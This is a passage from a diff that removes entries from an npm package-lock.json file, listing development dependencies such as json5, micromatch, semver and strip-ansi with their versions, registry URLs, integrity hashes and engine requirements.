"sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": 